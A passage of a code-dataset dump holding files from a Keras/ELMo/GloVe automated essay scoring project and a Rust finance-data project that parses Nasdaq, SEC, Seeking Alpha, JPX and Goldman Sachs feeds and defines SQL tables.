handling')\nparser.add_argument('--bs', type=int, default=5)\nparser.add_argument('--fold', type=int, default=1)\nparser.add_argument('--ft', type=bool, default=False,\n help='enable fine-tuning ELMo (elno_trainable)')\nparser.add_argument('--augment', type=bool, default=True,\n help='include augment during testing')\nargs = parser.parse_args()\n\nprompts = [args.prompt]\nif args.prompt == -1:\n prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n\nEPOCH = args.epoch\nBATCH_SIZE = args.bs\nMODEL_NAME = args.name\n\nprint(args)\nprint('ALL PROMPTS :', prompts)\nprint('BATCH SIZE :', BATCH_SIZE)\nprint('MODEL_NAME :', MODEL_NAME)\nprint('EPOCH :', EPOCH)\nprint('-------')\n\nfor p in prompts:\n print('PROMPT :', p)\n\n weight_path = utils.mkpath('weight/{}/{}'.format(MODEL_NAME, p))\n weight = utils.get_weight_at_epoch(weight_path, EPOCH)\n if not weight:\n print('weight not found')\n continue\n\n test_df = data_utils.load_data(p, 'test')\n print(test_df.shape)\n\n from keras import backend as K\n K.clear_session()\n model = models.build_elmo_model_full(\n p, only_elmo=False, use_mask=True, summary=False)\n\n print('Loading weight :', weight)\n model.load_weights(weight)\n\n test_gen = data_utils.elmo_gen(\n p, test_df, batch_size=BATCH_SIZE, test=True, shuffle=False)\n test_steps = np.ceil(len(test_df) / BATCH_SIZE)\n\n print(test_gen, test_steps)\n\n y_true = data_utils.prepare_elmo_features(\n test_df, p, y_only=True, norm=True)\n\n y_pred = model.predict_generator(\n test_gen, steps=test_steps, verbose=1)\n\n eval_utils.generate_qwk(p, MODEL_NAME, y_true,\n y_pred, EPOCH, suffix='test')\n\n if args.augment:\n print('Predicting on augment sets...')\n aug_pred = {}\n for augment in data_utils.augment_set:\n aug_gen = data_utils.augment_gen(\n p, test_df, batch_size=BATCH_SIZE, augment=augment)\n aug_steps = np.ceil(len(test_df) / BATCH_SIZE)\n\n aug_pred[augment] = model.predict_generator(\n aug_gen, steps=aug_steps, verbose=1)\n\n eval_utils.generate_score(\n p, MODEL_NAME, EPOCH, y_true, y_pred, aug_pred, test_df)\n\n eval_utils.generate_robustness(\n p, MODEL_NAME, EPOCH, y_true, y_pred, aug_pred)\n\nif len(prompts) == 8:\n eval_utils.generate_summary(prompts, MODEL_NAME, EPOCH)\n" }, { "alpha_fraction": 0.7248803973197937, "alphanum_fraction": 0.7296651005744934, "avg_line_length": 25.125, "blob_id": "4e1eb8cb6cb83f2a9a8e3a415b80b5b684b279c5", "content_id": "458f07edaeee4781bf07c36167060c72ab85e250", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 418, "license_type": "no_license", "max_line_length": 74, "num_lines": 16, "path": "/summary.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import eval_utils\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('name', type=str, help='model name for path handling')\nparser.add_argument('--epoch', type=int, default=0)\nargs = parser.parse_args()\n\nEPOCH = args.epoch\nMODEL_NAME = args.name\n\nif EPOCH == 0:\n print('Best epoch mode')\n eval_utils.generate_summary_best(MODEL_NAME)\nelse:\n eval_utils.generate_summary(MODEL_NAME, EPOCH)\n" }, { "alpha_fraction": 0.607299268245697, "alphanum_fraction": 0.6160584092140198, "avg_line_length": 22.620689392089844, "blob_id": "fb4ccdc4fb565b682299f01e3416283667cd1525", "content_id": "c09a352aa768ad21bf16330963a02c24119f33d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 685, "license_type": "no_license", "max_line_length": 61, "num_lines": 29, "path": "/utils.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import os\nimport glob\n\n\ndef mkpath(path):\n if not os.path.exists(path):\n os.makedirs(path)\n return path + '/'\n\n\ndef get_epoch(x):\n return int(x.split('.')[1].split('_')[2])\n\n\ndef get_last_epoch(weight_path):\n weights = sorted(glob.glob(os.path.join(\n weight_path, 'weight.*.h5')), key=get_epoch)\n last_weight = weights[-1] if weights else None\n last_epoch = get_epoch(last_weight) if last_weight else 0\n return last_weight, last_epoch\n\n\ndef get_weight_at_epoch(weight_path, epoch):\n weights = glob.glob(os.path.join(\n weight_path, 'weight.*.h5'))\n for w in weights:\n if get_epoch(w) == epoch:\n return w\n return None\n" }, { "alpha_fraction": 0.8120805621147156, "alphanum_fraction": 0.8255033493041992, "avg_line_length": 33.38461685180664, "blob_id": "8d81e00c64151c93a254c857066646f35e4b9a31", "content_id": "42f7321447128771d6e81dc76783293df144201e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 447, "license_type": "no_license", "max_line_length": 101, "num_lines": 13, "path": "/README.md", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "# aes\n \nA Comparative Study of Pretrained Language Models for Automated Essay Scoring with Adversarial Inputs\n\nPhakawat Wangkriangkri\n\nDepartment of Computer Engineering, Chulalongkorn University\n\nImplemented with Keras and Tensorflow for GloVe and ELMo models, and Pytorch for BERT model\n\nGloVe model original implementation by https://github.com/feidong1991/aes\n\nElmoEmbeddingLayer based on https://github.com/strongio/keras-elmo/blob/master/Elmo%20Keras.ipynb\n" }, { "alpha_fraction": 0.6288873553276062, "alphanum_fraction": 0.6368348598480225, "avg_line_length": 33.04705810546875, "blob_id": "37b403384db582c729fe810d7ba7994b25d0dce4", "content_id": "1269ef4ef8d367103bcc511cccd60deea53dad64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2894, "license_type": "no_license", "max_line_length": 166, "num_lines": 85, "path": "/glove_train.py", "repo_name": "sunnypwang/aes", "src_encoding": "UTF-8", "text": "import sys\nimport argparse\nimport os\nimport numpy as np\nfrom keras import backend as K\nfrom keras.callbacks import *\n\nimport utils\nimport data_utils\nimport eval_utils\nimport models\n\nparser = argparse.ArgumentParser()\nparser.add_argument('prompt', type=int, help='-1 for all prompts')\nparser.add_argument('epoch', type=int)\nparser.add_argument('name', type=str, help='model name for path handling')\nparser.add_argument('--bs', type=int, default=10)\nparser.add_argument('--fold', type=int, default=1)\nparser.add_argument('--ft', action='store_true',\n help='enable fine-tuning')\nparser.add_argument('--drop', type=float, default=0.5,\n help='dropout')\nargs = parser.parse_args()\n\nprompts = [args.prompt]\nif args.prompt == -1:\n prompts = [1, 2, 3, 4, 5, 6, 7, 8]\n\n\nBATCH_SIZE = args.bs\nMODEL_NAME = args.name\n\nprint(args)\nprint('ALL PROMPTS :', prompts)\nprint('BATCH SIZE :', BATCH_SIZE)\nprint('MODEL_NAME :', MODEL_NAME)\nprint('-------')\n\nfor p in prompts:\n print('PROMPT :', p)\n\n weight_path = utils.mkpath('weight/{}/{}'.format(MODEL_NAME, p))\n last_weight, last_epoch = utils.get_last_epoch(weight_path)\n # move on to next prompt if epoch not greater than last one saved\n if args.epoch <= last_epoch:\n continue\n\n train_df = data_utils.load_data(p, 'train')\n val_df = data_utils.load_data(p, 'val')\n # test_df = data_utils.load_data(p, 'test')\n\n print(train_df.shape)\n print(val_df.shape)\n # print(test_df.shape)\n\n vocab = data_utils.get_vocab(p, train_df)\n glove_path = 'glove/glove.6B.50d.txt'\n emb_matrix = data_utils.load_glove_embedding(glove_path, vocab)\n\n K.clear_session()\n model = models.build_glove_model(\n p, len(vocab), emb_matrix, glove_trainable=args.ft, drop_rate=args.drop)\n\n if last_weight:\n print('Loading weight :', last_weight)\n model.load_weights(last_weight)\n\n train_gen = data_utils.gen(\n MODEL_NAME, p, train_df, vocab, batch_size=BATCH_SIZE)\n val_gen = data_utils.gen(MODEL_NAME,\n p, val_df, vocab, batch_size=BATCH_SIZE, shuffle=False)\n\n train_steps = np.ceil(len(train_df) / BATCH_SIZE)\n val_steps = np.ceil(len(val_df) / BATCH_SIZE)\n\n print(train_steps, val_steps)\n\n callbacks = [ModelCheckpoint(os.path.join(weight_path, 'weight.{}_{}_{{epoch:02d}}_{{val_loss:.4f}}.h5'.format(MODEL_NAME, p)), save_weights_only=True, period=1),\n CSVLogger(os.path.join(\n weight_path, 'history.csv'), append=True),\n eval_utils.EvaluateCallback(p, val_df, MODEL_NAME, vocab=vocab, batch_size=BATCH_SIZE)]\n model.fit_generator(train_gen, steps_per_epoch=train_steps,\n validation_data=val_gen, validation_steps=val_steps,\n epochs=args.epoch, initial_epoch=last_epoch,\n callbacks=callbacks)\n" } ]
10
kate-parshyna/Disease-classification
https://github.com/kate-parshyna/Disease-classification
6791c78a787f6b36de61e0642cd24cd1e99571e5
ea77a7c64815d34ba353a82bea63d2789158cbe3
806a3c76af5641c102b878e4782b956ad7be517a
refs/heads/master
2020-04-08T08:54:50.587464
2018-12-07T14:50:23
2018-12-07T14:50:23
159,199,185
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5776058435440063, "alphanum_fraction": 0.5817022919654846, "avg_line_length": 26.123456954956055, "blob_id": "6706878df5a563fa37fffe8ca5fab1c6b75f4a94", "content_id": "a9f3627b0e3829d9843b2aea8cdec03549a39124", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2197, "license_type": "no_license", "max_line_length": 93, "num_lines": 81, "path": "/desease_detector.py", "repo_name": "kate-parshyna/Disease-classification", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport requests\nimport tempfile\nimport operator\n\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom werkzeug.utils import secure_filename\nfrom flask import render_template\n\nfrom label_image import get_result\n\n\nUPLOAD_FOLDER = './images'\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nCORS(app, support_credentials=True)\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n\[email protected]('/')\ndef index():\n return render_template('index.html')\n\[email protected](\"/detector\", methods=['POST'])\n@cross_origin()\ndef receive_message():\n if request.method == 'POST':\n print(request.files)\n print(request.data)\n print(request.headers['Content-Type'])\n\n if request.headers['Content-Type'] == 'image/jpeg':\n tf = tempfile.NamedTemporaryFile(buffering=-1, dir='images')\n print(tf.name)\n\n filename = '{}.{}'.format(tf.name, request.headers['Content-Type'].split('/')[1])\n\n with open(filename, 'wb') as f:\n f.write(request.data)\n else:\n if 'file' in request.files:\n file = request.files['file']\n print(file)\n elif 'image' in request.files:\n file = request.files['image']\n else:\n return jsonify('No file present')\n\n if file.filename == '':\n return jsonify('No selected file')\n\n if file and allowed_file(file.filename.lower()):\n filename = secure_filename(file.filename.lower())\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n deseases = get_result(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n result = []\n for key in deseases.keys():\n result.append({\n 'name': key,\n 'value': deseases.get(key)\n })\n\n print(result)\n\n return jsonify(result)\n\n\nif __name__ == \"__main__\":\n app.run(threaded=True, host='0.0.0.0')\n" }, { "alpha_fraction": 0.6668526530265808, "alphanum_fraction": 0.6858258843421936, "avg_line_length": 22.246753692626953, "blob_id": "2f4bff9f589f244fcdee820978b1ce9139eb42ac", "content_id": "19f37709abee65fb9ce40b259cb0cedd3df6f2da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1792, "license_type": "no_license", "max_line_length": 258, "num_lines": 77, "path": "/README.md", "repo_name": "kate-parshyna/Disease-classification", "src_encoding": "UTF-8", "text": "# Disease-classification\n## Overview\nThis program classifies skin diseases. This program use TensorFlow Hub to ingest pre-trained pieces of models, or modules as they are called. For starters, we will use the image feature extraction module with the Inception V3 architecture trained on ImageNet\n The model classifies the following diseases:\n \n -couperose;\n -eczema;\n -herpes;\n -ineffective;\n -lichen;\n -normal;\n -pruritus nodular;\n -psoriasis.\n## Installation\nBefore starting the classification, it is necessary to install the modules that are used in this program.\n\nPython instatall: \n````\nsudo apt-get update\n\nsudo apt-get install python3.6\n````\nRequirements install:\n````\nsudo pip3 install tensorflow==1.12.0\n\nsudo pip3 install tensorflow-hub\n\nsudo pip3 install Flask==1.0.2\n\nsudo pip3 install Flask-Cors==3.0.7\n````\n## Usage\n\n### Training\n\nFor classification used Tensorflow inception v3 model. Before starting the training you need to create a data structure.\n\nFolder structure:\n````\ndataset/\n couperose/\n couperose_1.jpg\n couperose_2.jpg\n .\n .\n .\n couperose_n.jpg\n eczema/\n eczema_1.jpg\n eczema_2.jpg\n .\n .\n .\n eczema_n.jpg\n herpes/\n ineffective/\n lichen/\n normal/\n pruritus nodular/\n psoriasis/\n````\nUse this command for retraining:\n\n````\npython3 retrain.py --image_dir path/to/folder/with/dataset/ \n````\n\n### Testing\nIn order to start testing, you need to start the server where the testing will be conducted.\n\nThe server will be started by the following command:\n\n````\npython3 desease_detector.py \n````\nAfter the server is running, you need to go to the server address, where you can see the interface for testing. This is 127.0.0.1:5000.\n\n\n" }, { "alpha_fraction": 0.515999972820282, "alphanum_fraction": 0.6480000019073486, "avg_line_length": 30.375, "blob_id": "0b96b48aa7205c01e5fdb70bf4ef45f8e28e25c1", "content_id": "63d9c5f2277d08e95aad6b109d1972f5dbd544e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 161, "num_lines": 8, "path": "/test.py", "repo_name": "kate-parshyna/Disease-classification", "src_encoding": "UTF-8", "text": "import requests\n\n\nt = {'normal': 0.319, 'psoriasis': 0.029, 'pruritus nodular': 0.019, 'couperose': 0.002, 'ineffective': 0.349, 'lichen': 0.021, 'herpes': 0.257, 'eczema': 0.004}\n\nresult = dict(sorted(t.items(), key=lambda kv: kv[1]))\n\nprint(result)" } ]
3
adamkeller2000/sipfin
https://github.com/adamkeller2000/sipfin
77937a63e9597bc922d7b5813ee6705f49b41557
117119c7a766976bebff08bb6e8af0ad02c5ffea
1e4642a795325c2c831a3a60c3dc21c197a7733b
refs/heads/master
2022-10-12T05:41:41.834325
2020-06-06T21:13:44
2020-06-06T21:13:44
270,098,479
1
0
null
2020-06-06T20:38:27
2020-06-06T19:57:18
2020-06-06T19:57:15
null
[ { "alpha_fraction": 0.5986118912696838, "alphanum_fraction": 0.6032388806343079, "avg_line_length": 26.428571701049805, "blob_id": "00b8c4fc6377f3256931c639a1b2eedf6ef0e062", "content_id": "932c81d105e6f5e090a9467f761e4ada4c4accde", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1729, "license_type": "no_license", "max_line_length": 95, "num_lines": 63, "path": "/finox/src/nasdaq/chart.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use crate::nasdaq::gen;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ChartRoot {\n pub data: ChartData,\n pub message: ::serde_json::Value,\n pub status: ::serde_json::Value,\n}\n\nimpl ChartRoot {\n pub fn to_recs(&self) -> Vec<Vec<String>> {\n let symb = self.data.symbol.to_string();\n return self.data\n .chart\n .iter()\n .map(|c| vec![symb.to_string(), c.x.to_string(), c.y.to_string()])\n .collect();\n }\n\n pub fn get_id(&self) -> String {\n let mut id: String = self.data.symbol.to_string();\n id.push('c');\n return id;\n }\n\n //pub fn gen_header(&self) -> Vec<String> {\n // //return vec![\"t\".to_string(), self.data.symbol.to_string()]; //chart header\n // return vec![\"t\".to_string(), self.data.symbol.to_string()]; //chart header\n //}\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ChartData {\n pub symbol: String,\n pub company: String,\n pub time_as_of: String,\n pub is_nasdaq100: bool,\n pub last_sale_price: String,\n pub net_change: String,\n pub percentage_change: String,\n pub delta_indicator: String,\n pub previous_close: String,\n pub chart: Vec<Chart>,\n pub events: ::serde_json::Value,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Chart {\n pub z: gen::DateVal,\n pub x: i64,\n pub y: f64,\n}\n\n\npub const NDAQ_CHART_HEADER: [&'static str; 3] = [\n \"symbol\",\n \"t\",\n \"x\",\n];\n\n" }, { "alpha_fraction": 0.46086955070495605, "alphanum_fraction": 0.678260862827301, "avg_line_length": 27.75, "blob_id": "93eec8e05f435863351b40489a42da117abc473a", "content_id": "de20bd1c4eeb01bccc24a78b2dd33680a57d0753", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 115, "license_type": "no_license", "max_line_length": 45, "num_lines": 4, "path": "/SipFin/Project.toml", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "name = \"SipFin\"\nuuid = \"70013b41-fe71-44ed-a28c-513d48e90f39\"\nauthors = [\"anandijain <[email protected]>\"]\nversion = \"0.1.0\"\n" }, { "alpha_fraction": 0.6349302530288696, "alphanum_fraction": 0.6446331143379211, "avg_line_length": 30.11320686340332, "blob_id": "aec03b774d761099d6c37534c735c291e98fd9b0", "content_id": "c31df65263d4a772cc8f39d794219e427f333ae6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1649, "license_type": "no_license", "max_line_length": 116, "num_lines": 53, "path": "/finox/src/news/sa.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n/*\nhttps://finance.api.seekingalpha.com/v2/real-time-prices?symbols%5B%5D=GOOG\nhttps://seekingalpha.com/tooltips/get\nhttps://seekingalpha.com/news/trending_news\nhttps://seekingalpha.com/symbol/AAPL/financials-data?period_type=quarter&statement_type=income-statement&is_pro=true\nhttps://seekingalpha.com/account/ajax_get_comments?id=4337864&type=Article\n*/\n\n// https://seekingalpha.com/get_trending_articles\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct SARoot {\n pub list: Vec<List>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct List {\n pub id: i64,\n pub path: String,\n pub title: String,\n pub slug: Option<String>,\n pub company_name: Option<String>,\n pub author_picture: String,\n pub author_name: ::serde_json::Value,\n pub publish_on: i64,\n pub comments_counts: String,\n pub author_user_id: i64,\n}\n\nimpl crate::HasRecs for SARoot {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.list.iter().map(|x| x.to_rec()).collect()\n }\n}\n\nimpl List{\n pub fn to_rec(&self) -> Vec<String> {\n vec![ \n self.id.to_string(),\n self.author_user_id.to_string(),\n self.publish_on.to_string(),\n self.title.replace(\",\", \";\").to_string(),\n self.slug.clone().unwrap_or(\"\".to_string()).to_string(),\n self.comments_counts.to_string(),\n self.author_name.to_string().replace(\",\", \";\"),\n self.path.to_string(),\n ]\n }\n}\n" }, { "alpha_fraction": 0.586056649684906, "alphanum_fraction": 0.6078431606292725, "avg_line_length": 17.31999969482422, "blob_id": "ac19c23d46bcdd537d60798a4d8665f4695a4e65", "content_id": "cf85c45839b75c0520358c1ed8404cf8b8790300", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 459, "license_type": "no_license", "max_line_length": 169, "num_lines": 25, "path": "/tables.sql", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "/*\nschemas\n\n*/\n\ncreate table rt(\n\tsymbol varchar(16),\n\tt timestamp, \n\tx float,\n\tv int\n);\n\ncreate table fred(\n\tt date,\n\tx float,\n\tid varchar(32)\n);\n\n/*\nqueries\n\n*/\nselect a.id, a.t, a.x, b.id, b.t, b.x from fred a inner join fred b on a.t = b.t where b.id = 'DGS3MO' and a.id = 'DPRIME';\n\nselect a.t, a.x x1, b.x x2, c.x x3 from fred a inner join fred b on a.t = b.t inner join fred c on b.t = c.t where a.id = 'DPRIME' and b.id = 'DGS3MO' and c.id = 'DTB6';\n\n" }, { "alpha_fraction": 0.6741573214530945, "alphanum_fraction": 0.6741573214530945, "avg_line_length": 11.714285850524902, "blob_id": "039044d13a7a784774a8dc094a1e3e5386017940", "content_id": "e84f24a3644a657c1093e073b4cedf68a7c6df02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 89, "license_type": "no_license", "max_line_length": 29, "num_lines": 7, "path": "/README.md", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "# sipfin\n\n\n## todo \n* roses -> finox\n* general slash trash\n* bare minimum tests and docs\n" }, { "alpha_fraction": 0.6097031235694885, "alphanum_fraction": 0.6140477657318115, "avg_line_length": 29, "blob_id": "0be24dd61f23931e5b7605cb15b654196fbc5003", "content_id": "38cead9c2a29f786ebdeb65a4c987be2c9a97872", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1381, "license_type": "no_license", "max_line_length": 95, "num_lines": 46, "path": "/finox/src/news/jpxnews.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n// https://www.jpx.co.jp/english/news/news_ym_01.json\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"snake_case\")]\npub struct Root {\n pub kind: String,\n pub category: Vec<String>,\n pub corporation: Vec<String>,\n pub ir_category: Vec<String>,\n pub product_category: Vec<String>,\n pub title: String,\n pub url: String,\n pub updated_date: JPXUpdatedDate,\n pub display_type: String,\n pub external_flg: Vec<String>,\n pub extension_icon: String,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\npub struct JPXUpdatedDate {\n pub year: String,\n pub month: String,\n pub day: String,\n}\n\nimpl Root {\n pub fn to_rec(&self) -> Vec<String> {\n let ret: Vec<String> = vec![\n self.kind.to_string(),\n self.category[0].to_string(),\n self.corporation[0].to_string(),\n self.ir_category[0].to_string(),\n self.product_category[0].to_string(),\n self.title.replace(\",\", \" \"),\n self.url.to_string(),\n self.updated_date.year.to_string(),\n self.updated_date.month.to_string(),\n self.updated_date.day.to_string(),\n ];\n return ret;\n }\n}\n\n" }, { "alpha_fraction": 0.4733441174030304, "alphanum_fraction": 0.47859451174736023, "avg_line_length": 35.411766052246094, "blob_id": "b345498657e82a7d0f44c797ae9019dcb4b79971", "content_id": "ecc3fed08686b491edc4e006bc89c625839a25cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2476, "license_type": "no_license", "max_line_length": 89, "num_lines": 68, "path": "/finox/src/bin/sec.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "//#![deny(warnings)]\nextern crate regex;\nextern crate reqwest;\nextern crate serde;\nextern crate tokio;\nuse finox::{roses, sec};\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn std::error::Error>> {\n let index = roses::read_into::<sec::SecIndex>(\"../ref_data/sec13f.csv\").unwrap();\n let urls: Vec<String> = index\n .iter()\n .map(|x| format!(\"https://sec.gov/Archives/{}\", x.filename))\n .collect();\n let headers = finox::fetch_strings(urls.to_vec()).await;\n println!(\"{:#?}\", headers);\n Ok(())\n}\n\n//pub fn cik_to_url(s: &str) -> String {\n// format!(\"https://sec.report/CIK/{}\", s)\n//}\n//\n//pub fn nresults(textrsp: &str) -> Option<u64> {\n// let sel = Selector::parse(\"small\").unwrap();\n// let doc = Html::parse_document(&textrsp);\n// // docs on current page\n// //let docs_sel = Selector::parse(\"\");\n// // num pages\n// for n in doc.select(&sel) {\n// let text = n.text().collect::<Vec<_>>();\n// for txtelt in text.iter() {\n// if txtelt.contains(&\"Results\") {\n// let split_txt: Vec<&str> = txtelt.split(' ').collect();\n// let num_filings = split_txt[2];\n// let num_pages: f64 = num_filings.parse::<f64>().unwrap() / 50.;\n// let np_int = num_pages.ceil() as u64;\n// return Some(np_int);\n// }\n// }\n// }\n// return None;\n//}\n//pub fn cik_docs(textrsp: &str) -> Option<Vec<String>> {\n// let sel = Selector::parse(\"div\").unwrap();\n// let a_tags = Selector::parse(\"a\").unwrap();\n// let trows = Selector::parse(\"tr\").unwrap();\n// let doc = Html::parse_document(&textrsp);\n// let mut hrefs = vec![];\n// for (i, div) in doc.select(&sel).enumerate() {\n// if let Some(\"documents\") = div.value().attr(\"id\") {\n// println!(\"{}: {:#?}\", i, div.value());\n// for (_j, divbody) in div.select(&sel).enumerate() {\n// if let Some(\"panel-body\") = divbody.value().attr(\"class\") {\n// for (j, tr) in div.select(&trows).enumerate() {\n// for a_tag in tr.select(&a_tags) {\n// let href = a_tag.value().attr(\"href\").unwrap().to_string();\n// println!(\"{} {}: {:#?}\", i, j, href);\n// hrefs.push(href);\n// }\n// }\n// }\n// }\n// }\n// }\n//\n// return Some(hrefs);\n//}\n" }, { "alpha_fraction": 0.6206563711166382, "alphanum_fraction": 0.623552143573761, "avg_line_length": 26.626667022705078, "blob_id": "fc394e4f3e62e78ce3706253b6d5be35166ccbd9", "content_id": "12c0633d7379fbaa885e4692c7ad67edd3864431", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 2072, "license_type": "no_license", "max_line_length": 95, "num_lines": 75, "path": "/finox/src/news/gs.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n// https://www.goldmansachs.com/insights/insights-articles.json\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub items: Vec<GSItem>,\n pub articles: Vec<GSArticle>,\n}\n\nimpl crate::HasRecs for Root {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.articles.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct GSItem {\n pub description: String,\n pub title: String,\n pub node_id: i64,\n pub url: String,\n pub featured_articles: Option<Vec<GSArticle>>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct GSArticle {\n pub has_video: bool,\n pub date: Option<String>,\n pub has_audio: bool,\n pub topics: Option<Vec<GSTopic>>,\n pub image_url: Option<String>,\n pub description: String,\n pub title: String,\n pub node_id: i64,\n pub url: String,\n pub series: Option<GSTopic>,\n}\n\nimpl GSArticle {\n pub fn to_rec(&self) -> Vec<String> {\n return vec![\n self.node_id.to_string(),\n self.date.clone().unwrap_or(\"\".to_string()),\n self.title.to_string(),\n self.description.to_string(),\n self.has_video.to_string(),\n self.has_audio.to_string(),\n ];\n //rec.append(&mut lilmatcher_gstopic(self.series.clone()));\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct GSTopic {\n pub title: String,\n pub node_id: i64,\n pub url: String,\n}\n\nimpl GSTopic {\n pub fn to_rec(&self) -> Vec<String> {\n vec![\n self.title.to_string(),\n self.node_id.to_string(),\n self.url.to_string(),\n ]\n }\n}\n" }, { "alpha_fraction": 0.5111982226371765, "alphanum_fraction": 0.5375139713287354, "avg_line_length": 30.89285659790039, "blob_id": "c5bb7d5401cd9e1d3420d50a2815f462e96f067b", "content_id": "9c8e2c8e3f7326897d45f772744bfdf1754c3345", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1786, "license_type": "no_license", "max_line_length": 73, "num_lines": 56, "path": "/finox/src/bin/rt.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate chrono;\nextern crate reqwest;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nextern crate tokio;\n\nuse chrono::{prelude::*, Timelike, Utc};\n\nuse std::{collections::HashMap, env, thread, time::Duration};\n\n#[tokio::main]\nasync fn main() -> Result<(), String> {\n let args = env::args().collect::<Vec<String>>();\n let debug = if args.len() > 1 { true } else { false };\n let filepath = \"../ref_data/tickers_stocks.txt\";\n let tickers = finox::roses::read_tickers(filepath);\n let mut hm = HashMap::new();\n for symb in tickers.iter() {\n hm.insert(\n finox::Security::Stock(symb.to_string()),\n FixedOffset::east(5 * 3600).ymd(1970, 1, 1).and_hms(0, 1, 1),\n );\n }\n\n let mut i: usize = 0;\n loop {\n let dt = Utc::now();\n i = i + 1;\n\n let s = dt.num_seconds_from_midnight();\n // fix this spagetti\n if !debug && s < 13 * 3060 + 30 * 60 {\n println!(\"premarket {:?}\\n\", dt.timestamp());\n thread::sleep(Duration::from_secs(10));\n } else if !debug && s > 20 * 3600 {\n println!(\"market is closed{:?}\\n\", dt.timestamp());\n thread::sleep(Duration::from_secs(100));\n } else {\n println!(\"{}: market is open{:?}\", i, dt.to_rfc3339());\n\n hm = finox::fetch_rt(hm).await;\n\n println!(\"hashmap {:#?}\", hm);\n }\n }\n //Ok(())\n}\n\n//match args[2].as_str() {\n// \"realtime-trades\" => nasdaq_o2::lil_fetchvv_rt(urls).await,\n// \"chart\" => nasdaq_o2::lil_fetchvv_chart(urls).await,\n// \"option-chain\" => nasdaq_o2::lil_fetchvv_oc(urls).await,\n// \"info\" => nasdaq_o2::lil_fetchv(urls).await,\n// _ => panic!(\"todo, make fetch generic over <T>\"),\n// };\n" }, { "alpha_fraction": 0.5792728662490845, "alphanum_fraction": 0.5927661061286926, 